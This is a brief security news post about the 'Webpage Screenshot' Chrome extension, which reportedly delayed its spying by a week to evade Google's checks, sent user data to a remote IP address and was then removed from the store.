Popular Chrome extension turns out to be Spyware!
If an extension is listed for Chrome and has a decent rating, it is surely safe to install, right? Maybe not. In today’s world spying has become a common activity. That does not mean though that it is any more acceptable. A Chrome extension known as Webpage screenshot collects private information about its users and shamelessly sells it to a third party. What is astonishing is that the extension has an excellent rating of 4.5 stars and has been downloaded by 1.2 million users worldwide. This highlights the lack of awareness among customers as to what such programs actually do behind the scenes.
Extension turns into Spyware after one week
According to the founder of the CSIS Security Group, Peter Kruse:
“To avoid any security check or detection mechanism from Google, Webpage Screenshot includes a sleep function, so that the spyware-like behavior will not be activated right away, but a week later.”
Google’s security check usually filters out malicious extensions from the chrome library, which is probably why the original software does not act like spyware at all. After a week however, it downloads additional components/code and commences the spying program. This way, the spyware part of code evades the scanners. Once activated, the spyware component collects sensitive information about the user and transmits it to the ip address: 220.127.116.11, located in New York, USA.
Heimdal Security have analysed this extension in detail and confirmed that the transmitted information could be used to identify an individual which definitely makes this a privacy threat.
The greater concern though, is that several other extensions may also be using the same method to avoid Google’s security measures. This is a serious vulnerability and could allow cyber criminals to use Chrome apps and extensions for their malicious activities. They simply have to add the malicious part a day, a week or a month later.
Luckily, in this case, Google acted quickly to take down this spyware extension from their store, but there is certainly a bigger problem that needs to be addressed with the current app/extension verification system.
Have a nice (spyware-free) day!
Trojan downloader Waski steals login credentials